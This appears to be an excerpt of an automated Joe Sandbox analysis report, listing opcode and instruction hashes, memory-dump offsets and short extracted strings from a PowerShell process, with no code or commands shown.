                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0a486c35df0050221bbe240f282a3dd00e6033b853531f0249375ca01a24eb69
                                        • Instruction ID: da961d6146d2802d89a702a97c17ef51e0dae8119bca6072913dbddfcfbf882d
                                        • Opcode Fuzzy Hash: 0a486c35df0050221bbe240f282a3dd00e6033b853531f0249375ca01a24eb69
                                        • Instruction Fuzzy Hash: 6951A5716002049FDB05DF79D9507EEBBFAEF89300F14846AD805AB396DB359D41CBA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7298f949563d4eb0392bcf7866530b6012b9691c4910926c7525dc8ffd6f216f
                                        • Instruction ID: e4b0e4244b2291cb0c2cdfeb010e8ae06c0f1525cf0cff2b84f13b38fae7a64a
                                        • Opcode Fuzzy Hash: 7298f949563d4eb0392bcf7866530b6012b9691c4910926c7525dc8ffd6f216f
                                        • Instruction Fuzzy Hash: E5412631F043008FDBA5AF248A41B767FE6AF84260B1484B6F9019FA92D735DA40C7F5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 884400a80876539d4a153e037eb302afe9a257ff628cf463df73e33a9a428428
                                        • Instruction ID: 9fea9f8f72b58b21fcb5b4af2990f1b3b46ce4df0c26211f566bf80e85d8d6e2
                                        • Opcode Fuzzy Hash: 884400a80876539d4a153e037eb302afe9a257ff628cf463df73e33a9a428428
                                        • Instruction Fuzzy Hash: 1A513E357002098FCB08DF68D584ADD7BB6BF88314F189554D401AB3A6EB74ED95CFA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ec856bdbb878276292df439a01fb799ca384140bb0f2b52697f5b042953b47a9
                                        • Instruction ID: 922f54e643fc242db17c98058a20042d6033b01cbc6e050b907caabe60c0bd3a
                                        • Opcode Fuzzy Hash: ec856bdbb878276292df439a01fb799ca384140bb0f2b52697f5b042953b47a9
                                        • Instruction Fuzzy Hash: F1412274A002049FDB04DF79D5957AEBAFBEF88310F14C469D809AB396DF75AC418BA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 18ff5034c889283da13f49693eadfe6b5bdc851bdda5a06eea1ab1fcaaaac132
                                        • Instruction ID: 42135c354a95b97b4abd8b7181f46c11c83699a51cdd7b3168d613857417fb69
                                        • Opcode Fuzzy Hash: 18ff5034c889283da13f49693eadfe6b5bdc851bdda5a06eea1ab1fcaaaac132
                                        • Instruction Fuzzy Hash: E5413674A005059FCB09CF58C5989AAFBB1FF48310B218569D905AB365D732FCA0CFA4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 24470a0c16c5282c77bfec7c239f1f875ca786f728e77fca5518107f375e9889
                                        • Instruction ID: 02aeabc5a9d9b9d15bf2e832af6a73b4fe6bb49b543786bc040a9cf52db3eec7
                                        • Opcode Fuzzy Hash: 24470a0c16c5282c77bfec7c239f1f875ca786f728e77fca5518107f375e9889
                                        • Instruction Fuzzy Hash: B8215A32F042009FD7606F2895417BABFB29FC1250F0880BAD601DBA92DF75CA55CBE1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2175873195.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_abd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 83a9617cc88ee3c370df05db0eb36f4aebaf1c9d1883a3b2fdfb5a3802c0efa9
                                        • Instruction ID: 26759d030a04842569d5828dee4150d75add3c9d2946f2e1e2c56acca7be7a07
                                        • Opcode Fuzzy Hash: 83a9617cc88ee3c370df05db0eb36f4aebaf1c9d1883a3b2fdfb5a3802c0efa9
                                        • Instruction Fuzzy Hash: A521F171504200EFDF05CF64C9C0BA6BFA9FB98314F24C5ADE9094A257C33AD816CBA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2175873195.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_abd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1f6ba4cb34606b45c937968ea3da66db6d96b22f44110943821d25d444f24cb6
                                        • Instruction ID: f5171dce147553602751e784156769c92a8228d729f13d1de374b1db149327b3
                                        • Opcode Fuzzy Hash: 1f6ba4cb34606b45c937968ea3da66db6d96b22f44110943821d25d444f24cb6
                                        • Instruction Fuzzy Hash: D921CD76504280DFCF06CF20C9C4B66BF62FB48314F24C5A9E9094A257C33AD86ACBA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a1f7e42146c676d512500ef4f90a7805663cc62e720b9ed14515b5ec7680b465
                                        • Instruction ID: ed9c3f72d3784514b2dd0c41b24116b65a6df9a998bcc89c12b88d369b82920e
                                        • Opcode Fuzzy Hash: a1f7e42146c676d512500ef4f90a7805663cc62e720b9ed14515b5ec7680b465
                                        • Instruction Fuzzy Hash: ED01D1B93009109FC7466738A4195AE3BABEFC9726315405AE507C3741DE38AC06CBA2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2175873195.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_abd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fcf32c7b109afb9fbe02a2d08b879a558e32fdbbd13444ec72592763baac47d1
                                        • Instruction ID: fc061668db0f0cc1cf4e04de7a5c16c35d2ecb507fae35aee18e8cbe878848ba
                                        • Opcode Fuzzy Hash: fcf32c7b109afb9fbe02a2d08b879a558e32fdbbd13444ec72592763baac47d1
                                        • Instruction Fuzzy Hash: 6F0126310053009AE720AB29CD84BA7FFACEF46320F18C42AED4A0F247D2799C41CAB1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c3b9ecacd07ed277ffe9bb7a0170bf4e4d8bf00c2047a9b952c0a8dd54f8e165
                                        • Instruction ID: 2d0c2c1097ef24ab30a42b455ef121aed84f6cccb6b2418d06130711f62abb29
                                        • Opcode Fuzzy Hash: c3b9ecacd07ed277ffe9bb7a0170bf4e4d8bf00c2047a9b952c0a8dd54f8e165
                                        • Instruction Fuzzy Hash: 12F0F6317046008FDB181BB5B8642A93F92FBD5345F04417BD04786265EE6CED17DB52
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5c88d431dd4f55cfb9f85788176ec7afe66e6323f2dddae82b032391fbc39411
                                        • Instruction ID: eee1b7537e53d063664186b6ee43a82bb68ffb77c4cd9906db4722101e5e1afb
                                        • Opcode Fuzzy Hash: 5c88d431dd4f55cfb9f85788176ec7afe66e6323f2dddae82b032391fbc39411
                                        • Instruction Fuzzy Hash: D4F0E2323062102BC705226968649EB7F6AEFEA210705413AE00AC7302EE1A9C0A82F2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3d30417a72a8c0ba940e8b6e85b10fc3b9403fe82ce680a4c8c7d3945a97bcf0
                                        • Instruction ID: b337ec693572f022690c3b272214fdec5583e14ae8ce454951549f503d83c7ad
                                        • Opcode Fuzzy Hash: 3d30417a72a8c0ba940e8b6e85b10fc3b9403fe82ce680a4c8c7d3945a97bcf0
                                        • Instruction Fuzzy Hash: 0AF06D363006006BCB186779A464A6E77ABFFD9325F04453AD00A87354EF79EC0A8792
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: af056c237e71c857dc7358b57f3e5422877779f9ba25c084196399842dc571bd
                                        • Instruction ID: d8aa5150fae58b80c536f9d8208e917900adbbd972b47ec6c456726164065873
                                        • Opcode Fuzzy Hash: af056c237e71c857dc7358b57f3e5422877779f9ba25c084196399842dc571bd
                                        • Instruction Fuzzy Hash: DAF01DB53109109BC7456B38A05D52D7BEBEFC8765755805AE907C3750DE38AC02CB95
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2175873195.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_abd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b48a901e73312558392d77d12afe7cf658cb144e960072b2142c0c1e941c00c5
                                        • Instruction ID: 559a5cf8a444d63df066f412069a4b6812067afe91d7ba53c32a376746f603b0
                                        • Opcode Fuzzy Hash: b48a901e73312558392d77d12afe7cf658cb144e960072b2142c0c1e941c00c5
                                        • Instruction Fuzzy Hash: D0F0CD71004344AEE7208B1AC884BA2FF9CEF52724F18C45AED491E287C27A9C40CAB0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a16bc9114d93047dbf59ef25cb99d9ff4702a1b6f386dbf8f466348dac898cb8
                                        • Instruction ID: 24d8a2179e3c959190b7c326b00ac423ed741b3d13bde4443c3bfd871b89e234
                                        • Opcode Fuzzy Hash: a16bc9114d93047dbf59ef25cb99d9ff4702a1b6f386dbf8f466348dac898cb8
                                        • Instruction Fuzzy Hash: 9CF0A77110A3428FC702CB789520464BF75EF4520471486DBD844CB652DB36ED17DB61
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 43f0883234b399dc5b7f6447966069e7fb7ef4674ca1434aa2bb1fd72897e4f7
                                        • Instruction ID: 4f65587514a7ce9b76a96ddbce06a593e7564c2cd3fc4f525128df3157204b83
                                        • Opcode Fuzzy Hash: 43f0883234b399dc5b7f6447966069e7fb7ef4674ca1434aa2bb1fd72897e4f7
                                        • Instruction Fuzzy Hash: 77E04F742003069BC711DB69E811965BBAEEB4824472485A9ED08CB305EF32FE17DBA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4291a577fba403a764d2ea340b4f88af153b1e34728f3d3fdc7bf0d74867cdad
                                        • Instruction ID: 7eebbe16291634f4ebf80eb9ba825ca873d46efd99a4bd29de8cc51381bd9fa9
                                        • Opcode Fuzzy Hash: 4291a577fba403a764d2ea340b4f88af153b1e34728f3d3fdc7bf0d74867cdad
                                        • Instruction Fuzzy Hash: 14E04870D4020A5F8740DFBC894155FFFF49B59100B548A69D958D3241FB7196538BD6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b86196dde492a2500111453af681ce8d3b0a538b2a1ae0a87b304681ebfe429a
                                        • Instruction ID: b331600f60c0e3614253e87064373a272e528194927084e1245c2f00c2b9c202
                                        • Opcode Fuzzy Hash: b86196dde492a2500111453af681ce8d3b0a538b2a1ae0a87b304681ebfe429a
                                        • Instruction Fuzzy Hash: 22E04F38D0514A8BCF09EB64E85A8EEBF74EE14315F00819DED5763651EA30199EDF82
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                        • Instruction ID: d3064e2e0e622c419b30d0c8d47ef2492e1a82d1dd645ed9d533ed7355ac575c
                                        • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                        • Instruction Fuzzy Hash: CCD067B0D042099F8784EFADC94156EFBF4EB49200F6485AAD919E7301F7729A128FD1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0a7d059f8f77cf2ca3efe8e70d256c8881121244421720199400bfbc4892ebb0
                                        • Instruction ID: 1ed22536e6f1d070793fb5a9335c14aeda23b86b2e535b405005e8f13bd69476
                                        • Opcode Fuzzy Hash: 0a7d059f8f77cf2ca3efe8e70d256c8881121244421720199400bfbc4892ebb0
                                        • Instruction Fuzzy Hash: FED0673890411A8BCB0CABA4E85A4BDBB74EE10205F40516EEA1752691BA30295FDF82
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q$Vl$Vl
                                        • API String ID: 0-4126559129
                                        • Opcode ID: 94472b85f2895b3109a26a5a3a011de756d6c54e0ce26bc7097e38dc572552fc
                                        • Instruction ID: 8d6d0daf67e48c717b5aa4bad6973039772582533b1b176fce2b96ea51e186e5
                                        • Opcode Fuzzy Hash: 94472b85f2895b3109a26a5a3a011de756d6c54e0ce26bc7097e38dc572552fc
                                        • Instruction Fuzzy Hash: DFA16832B083049FD764AA6D980077ABFE6AFC1711F14847BF845CBA95DA36CA41C7A1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q$4']q$tP]q$tP]q$#Pk$$]q$$]q$$]q$Vl$Vl
                                        • API String ID: 0-4228332532
                                        • Opcode ID: 87734cf1c23b8fafdc79905125dab92eacdfc67ee5a5f00a106a773a48511a3d
                                        • Instruction ID: ba23f04b9b90b5a3733f1b9577c888d435cf46ff621626572ac98d732b3dc8db
                                        • Opcode Fuzzy Hash: 87734cf1c23b8fafdc79905125dab92eacdfc67ee5a5f00a106a773a48511a3d
                                        • Instruction Fuzzy Hash: 99A14932F083148FD765EA79981067ABFE6DFC2610B1484ABD445CB791DA36CC85C3E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: TPk$0U]q$4']q$4']q$XY`l$XY`l$tP]q$tP]q
                                        • API String ID: 0-3785342527
                                        • Opcode ID: dba1ad4da7cb9f33275457892e8497dfbff3aa6361921fe1099c40f2464ed784
                                        • Instruction ID: 09370c7a033cec0e1b81ec54fc8ac198f52aa9f07ed792c4b6f603666e15375d
                                        • Opcode Fuzzy Hash: dba1ad4da7cb9f33275457892e8497dfbff3aa6361921fe1099c40f2464ed784
                                        • Instruction Fuzzy Hash: ACB14632F042148FE765AB6E984176AFFE6EFC5210F24C46AD509CBA55DE32CC41C7A1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q$4']q$$]q$$]q$$]q$Vl$Vl
                                        • API String ID: 0-1196443061
                                        • Opcode ID: f190d0cc92b461462ea7547328af6a29a71bedd595509f46d767968e2bf9eafb
                                        • Instruction ID: 0c13c81bfd64e8beaba407162b05679f8b3455fe99a53605c8d4c89232ca3e06
                                        • Opcode Fuzzy Hash: f190d0cc92b461462ea7547328af6a29a71bedd595509f46d767968e2bf9eafb
                                        • Instruction Fuzzy Hash: AB516732F043058FDB65AA2D8820776BFF6EFC2250F14847BE845C7A66DA35CA41C7A1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q$4']q$$]q$$]q$$]q
                                        • API String ID: 0-2353078639
                                        • Opcode ID: 6cd2ea5f738b636727db67fda7d2847ada6ab41a9099e052e5bf2f8856ad9e07
                                        • Instruction ID: 285d719e58c460f90a9beb9593247a1dff14c88d32adab586b11a3c596efc918
                                        • Opcode Fuzzy Hash: 6cd2ea5f738b636727db67fda7d2847ada6ab41a9099e052e5bf2f8856ad9e07
                                        • Instruction Fuzzy Hash: FC414932F00305CFDB65BE6D985067ABFE6BF80251F24846AC844CB621EB35C815C7A1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
Similarity
• API ID:
• String ID: 4']q$4']q$4']q$4']q
• API String ID: 0-1785108022
• Opcode ID: 1751b4f9cc9bb71df6cced8f9ed210b06faed176735f056bdd39e630362a07c0
• Instruction ID: dd41d8fe26f2b75d8625db1e35d3699d0801894eb24b35972d36d0de6af9dff3
• Opcode Fuzzy Hash: 1751b4f9cc9bb71df6cced8f9ed210b06faed176735f056bdd39e630362a07c0
• Instruction Fuzzy Hash: 79812532F002198FCB64EB2C94107AABFF6EFC1211B2585BAD445EBA51DB31D845C7E2

Strings
Memory Dump Source
• Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
Similarity
• API ID:
• String ID: 4']q$4']q$4']q$4']q
• API String ID: 0-1785108022
• Opcode ID: 360dcfe6dab1aeb5ec28c067882a8f53af6961b5df354684010e6a511f75b2f4
• Instruction ID: 084ede062a8807bf48e43c909298b4a59b61246fe3245f9257a1a05b5349a3e3
• Opcode Fuzzy Hash: 360dcfe6dab1aeb5ec28c067882a8f53af6961b5df354684010e6a511f75b2f4
• Instruction Fuzzy Hash: 2C815531F082059FDB65AB2895002BA7FA69FC1210F1484BACA45DF695DF36C841C7E2

Strings
Memory Dump Source
• Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
Similarity
• API ID:
• String ID: $]q$$]q$$]q$$]q
• API String ID: 0-858218434
• Opcode ID: 082cacf652d8e431c25e538bfed5fa460ca47043ccd11687d7f7378831522920
• Instruction ID: 482be15b492ab75fcd73296ab35a154ff10b2c44f4a9386ebf2e227051791109
• Opcode Fuzzy Hash: 082cacf652d8e431c25e538bfed5fa460ca47043ccd11687d7f7378831522920
• Instruction Fuzzy Hash: C0214931B002045FEFB8A96E9840B36BFDAEFC0751F24842AD905EBA85CD35C801C371

Strings
Memory Dump Source
• Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
Similarity
• API ID:
• String ID: 4']q$4']q$$]q$$]q
• API String ID: 0-978391646
• Opcode ID: a595eb4a31af696d2280cc276584f4b17d6e29166868190f6d8e5b5bce01a2a4
• Instruction ID: 328661132b612b3af6afc7d885dd6ed846e33c5f4f786459585060adeaeb471f
• Opcode Fuzzy Hash: a595eb4a31af696d2280cc276584f4b17d6e29166868190f6d8e5b5bce01a2a4
• Instruction Fuzzy Hash: 54019E2270E3914FE32B22281821A666FBA8FC390031A88E7D481CF297CD184C09C3B7